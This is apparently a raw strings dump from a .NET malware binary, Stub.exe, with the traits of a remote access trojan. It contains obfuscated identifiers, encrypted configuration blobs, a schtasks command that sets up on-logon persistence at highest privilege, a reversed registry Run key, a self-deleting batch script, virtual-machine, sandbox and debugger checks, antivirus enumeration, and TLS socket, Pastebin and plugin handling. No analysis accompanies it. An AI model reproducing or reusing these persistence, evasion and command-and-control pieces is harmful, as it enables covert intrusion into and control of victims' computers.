!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
WGSZzPdPhTHdBEA
UyeCuZbrqXzUWTA
nktsYYywWUsnYHWA
sQMOntpBbA
jXkzuofXvcVlA
rxWnIsHBvnA
vLIvXvZtxswA
GBzDafuieKKhxA
jgYfasmcXDytCB
RRveBMmDDKSDB
hjfOPSRfshzSB
oroqnJpUmDjfKTB
xrhOAiAlsGVB
qQONQqVktYB
QDrmyGDZXbB
RMcZdvlQFAmB
mTdjOZHwKdCC
pIvdqlkkggMKC
jvzIsGqBLYvxBOPC
dcbuZbcfLHXC
WRjwKgpxcPPNpC
lUmEZtNeClIfxC
MapNameToOID
get_FormatID
WtGEKfxlLNRD
JqybJttSTD
prxlQkspuoOUD
DKjOsfDVBRhUD
RjNxIpTEXD
OdvBvvPjJqNHrjD
dnmMZcuYMHGWnAWlD
xgwXADSbVLbiHE
ANkARIrWqE
nTjOdKQTfKKAF
LkpukjKljFeaNrJFF
BbMzDixtgoLF
NlpbXeJXejzbQF
VLetQXRnhWRF
PmGDEkEWaYF
AOVoIQPNRddF
kfboxyYznF
GjAfwsaaboF
rGCWkVCigjSG
fzuZPDUJDTcG
WXhnBfFviG
nRNANTGLUVRpG
mpnDyYIDiqG
OjaMSYaFodHvG
mrCwLATvjqILH
KOJZcmnTdWhOyPH
ASFCNWYWEkcH
KCFNTQBpPsNdH
sIAdFWOSggH
rPNxUuWJcuUmH
AUkqJeOFjuQBI
get_ASCII
kBurorMsLVLI
QyOXQaiqaWUWI
DltPdgHvKxI
yNPHnYpXVDJ
aOgAlInFsFJ
rUlqgBlNIJ
YiuxgAGkCVJ
iPIAMSZjVJ
tiTULvuXCdJ
lSHRdyjduyGK
QUBmYxUTAbK
vAPQpKRZdK
dMwTXDacgK
tEyRlMojkNhK
tGfQFNVnFmK
MqzBxvotJhvrvK
GvQwHDfugmCL
cNUvJOKuqhKKL
mnepfQYuNL
hbTUiLHIUDUtusRL
hBTltcbaRqLVL
fjvZiqFLnFWL
KmAjhGZYjhcL
FGCdRmhXypL
xxujvzgQQQIvL
SpBoIRDhszIyL
MFMfMgtedgNCM
sDCPQXCyhM
dtcUcedKesM
rNXDgXztHtM
pdqZgcDeVFHwDN
RHWFDtpMIiUN
BFmAULTrSjHivN
pzbypZJmqqZTEzN
NfDKyuNTdCO
System.IO
SdZoXRJPCxHALO
kljefRyDxGiKoMO
IrNmzsiIUO
zIhXaDCGCrSyRjO
PxHLxtOdxVKiknO
ewvyNPynzLpgjBtO
xwVbgdyZyFxO
jlFqslcqzO
WiSlEcRTKAkGvCP
oBFexEpvIhIGP
rTkASMySYUP
YOsliCbFZXyIWP
zsBluaIZjhdXP
HokqPIgaQLZP
bvdsFjSDzFvdP
TdDyeXDJdqiqP
MlyZQZRixP
xolxCAJeDQ
FSdfaSgQJJQ
HfSvPKXBRQ
DqIEWhVUztbQ
wjmseAjBzazvQ
QBxBsyfdgyMSOjIDR
wpGWlfgZXDhR
sWCmEeOYrjIaxR
bJKUFfoaoqGLS
bLaAcfDirtMS
yoGvgVXVQDQS
FkMHQhXKwXKVYS
zzxhszHLdHT
MwoLVfjpoAIT
PasotZBoBIT
YslhLxtGYT
vrpRHksNIObT
ockwoAFSoT
CVwSNYsWNeWtT
gbMlqorZhFPHU
wTuYZirerPbU
dLqciYxkuhU
IPcxdyZWooiU
vgXGeBuFfBlU
xLOzCdxHpU
OuocWGUZzyBwkvU
OGUkZLUpxPSHkwU
get_IV
set_IV
GenerateIV
CgbJVshUevTvBbV
wIuBjQkjsieCJcV
JwaDUIsEzqSsKgV
BMcYDwqzxeVhV
fIJdPsHlxmepV
pEkGXBgnCFvXW
YnTEQyeerciYjVfW
GMdKDocLhQXqW
DRyoshFRhrlQYsW
XiwLCwBjLwUAX
PMdDYdrDpSVJX
vVwuSeHxVCcXX
WkUvTvJDwPbX
EfVjjKiDmgKnX
PwHtzAfQmtoX
dTfQbCfeYMhsX
fxGyFpLEWiwtX
gtRqcFmgNuX
SwLFzmScCYgvX
EYKBTpkdJgpY
ItuyInRwyQYGZ
iILNLkgqnUQIZ
FbxNcxKHQVIZ
OvpmpsRcAiuAzZ
sQUzlxkViDzZ
value__
vsDaJZzmzJa
cnTERPMLVEiwtiIPa
gQcrTcofWca
AVpbFHHcBnDpca
twIPrUIelMaLbDia
EqpnmilMziua
haHgPQZnAya
HwZLpNeeUjIb
mvnaTSTdPEZb
mscorlib
uhvNBRKfJc
AOebSYQEUc
DfwsHVEububc
jsToKHgfnGdc
System.Collections.Generic
Microsoft.VisualBasic
ZkvfgSBWoVjc
get_SendSync
RuntimeBrokerSvc
imUTrnJbnjmxc
sozCBCuvCqwUQTPzc
motmKWWFmpXUuFd
ejPzNnKzXTnKd
LRtqlfmshafUd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
AMKPFXMnGhld
Append
RegistryValueKind
zhecHJidYbhprd
FHBymeWvWvd
XSOxzeDUwd
yfJpLlgBHXCCe
CsztMObsQaKjKe
Replace
CreateInstance
XRBDsyZLFXde
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
cMysiVHffVLf
PTLJwGxMmNYwRf
EtMrXlKKubf
OcWGCHprSudf
aGIidfgZhmf
jCHfHlOgdSppf
vxvaHfILtf
CEeSqRXWqaTfJxf
HbTzAqaZtjAg
FQeaIgDLPEg
naMYuGXPECrEg
VeWrKpmTAVZg
FgdyoyGQiLOBLEeg
CryptoConfig
dYnjQpzcaXmjg
VnezXtrmmg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
hFnDVKCYUwg
KtEtxHBWyg
CYrJsVHnoSHh
qQlzwoacLhrcxSAMah
IfZDtncumVnmh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
CNiiwDHmiXxhSxh
RGNGTMvSENVIi
HpvfKQYrlrtci
VrTeKawTwWLj
vpIjjozHSfj
RtulgIvMYUhj
JVSGxsksAgwj
giqqyaxvuREk
vZQtTedbJvilxvGk
lGEEZUaAUwdJJk
efORCYNttFSk
yRBDoBtyBZk
CUQldytZTahnbk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
kAQLhSWEjVxck
zObulfKuaZik
EzimyXqLYWrAMmjk
IFfcDampahsnk
ELDHCftFCKISDok
LIMhfkFvfBl
ArfGmxuhbfeFl
lGTOsJEVzfLJl
skwsFewKqZHeLRl
gWhmTZOewoWl
eLVIEnRpWl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
wUlhCPiBHubl
TxTtzFxgmQfl
JcgxOwoEgl
rqnlxUFIbIgl
kernel32.dll
user32.dll
ntdll.dll
pCKGvWncHSuWGm
XuIpTCvfUELm
aqWJYiqLTHUm
wWHsLrnRORWm
vJBPHibHlevWm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
aKUVletGsGPdom
Random
TMGBKLMknMWaqm
ICryptoTransform
jmVZEkquMuQn
ToBoolean
ThkGviMsBewAbn
X509Chain
AppDomain
get_CurrentDomain
KhabydtEmjin
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
hfhIDOTGpbpqn
xYcypQGWupsn
nObfGhxeMo
UlyRhjmhkcXrbPo
UvOYsAvHufOyTo
dXzCbIgiHvUo
XniDAeSHpLiwYo
pSLBpkFnsbo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
dlQdUtgAPXoBp
JSfMazpDRSdDp
ZXCIiOxXVpNp
gxMLoaSYAUp
HoevFiggkRegBXp
XsyJPRcQFHep
ADYtfsFsatHep
Microsoft.CSharp
fTXzUneXzp
zNDezqzYfZBBq
uLahegcHCq
URDyCwwqEVjDq
UmOHnWyvdHRlGq
axCAubYExdJJq
bfARPfKUNq
UDgUEpSIWRq
xGJKUyXyJOFtSq
pZmjbDRGaAlJWYq
QKVsHsnfHiulYq
WfFzVjdcQZfq
WZndFXgxJlbIiq
System.Linq
PWszmgeIMlcnXEr
LtASDdXPCSOaPGr
wxScorluvUQAIKr
xWMudCZvLr
uDOiEWEAYFdOr
QJMUfcpTddUr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
lfWaEAYpkQmr
ecpkEHdhsSnr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
ivTUlxjilcdIpr
DHZFcERovLszrr
IntPtr
nMoEupJSzctr
oZVQxaOIJIs
EnBUybQXuWUs
khiiNDTgfMbtXs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
HLarkvzbjiCjs
UNuqpAtRdHCxIxjs
ICredentials
set_Credentials
Equals
SslProtocols
TuJXfCqKwcbsPms
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
GizLmmDXts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
BWzQDquNQfOxs
fZjWtuRbleHt
WsezMFCFiSWNt
mNelYSUWEpzhUt
Concat
ImageFormat
get_AsFloat
set_AsFloat
bQNMNGIDFYXfhxCct
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
SdYBKzJuHEKcKht
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
FAHRqFixHXwut
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
CJInRSVynENMHu
NlBhJWSTZIu
iWHFLeQvsFoxZVu
ZLeMzwUYIkau
TNENKTFzhqLXSbu
VaBRUiDjRrAjeu
jXwKRQuhGmIgu
eeeKUPKVuUhu
WZGCHwHJlu
xImVaSwEolu
EkJzanJUnu
trcLZfvsdWPvAv
vdAifppnVbrHyRKv
xJvFxXyarEXRkTv
lwZKZtAJNiv
hpVKZYDvBFWGw
FttxLrOFRmVlHw
xZbCzLUzkiVw
OyDoeThBIuYw
mxXsMMKBCDFQZw
VRAGYAqDiw
eyvFwqsORxYmw
GetForegroundWindow
set_CreateNoWindow
mhykqSZYshCperw
ufmCTbdSBtw
lQYDbwCoVtw
GLLhmEnlJQqYww
OeFaZyRzgazw
LeTWiRbTnRx
pWdxlKXadlx
WBtxWIrXODpx
fFecrDgastx
wRutAFoxbXkUy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
IymXmNpRGsy
bsBHtdOYhsqesy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
onIRlOFtOXAwy
vZvtjDawnczy
CWBcVsqumPGz
DnEKmiakiWz
MTWifRKnvElVjJcz
kbtNgsDxBSZtz
tCzcjywGduz
kEMACurKDJyvz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
Z3qxhZ+VVYrktCJBXlcCPSH6JAFa77+Q7qKT1ZiRSqPpXZokv5Ncezr9xXBLFBxzUmNy/ExvnFzgO8uY6KCGVw==
u9qavisGxaSqQtjtSROsT16vFfIOHRnwTSKqb/MhDo4lDqKvzklFcGUkNBNGsQhBbQoXPHWr6dH64GOgggZ2bQ==
cW2Tt8PrR/QtSTEODvpp/CQA5GrJkHhQ008rFMIYg7rqIUUJFHUSeS/cpAkuFI+oiKWJMSAqlwwBUGnbvBDSkA==
5PReH8utS+pGfG+XatUuLZ/EQGQPC/e0oTSdhmUbsSwOFURsoY4Gy2v/Q4eZyQiad78QhQw4f7+bAEFZ0dlPpQ==
%AppData%
RuntimeBrokerSvc.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0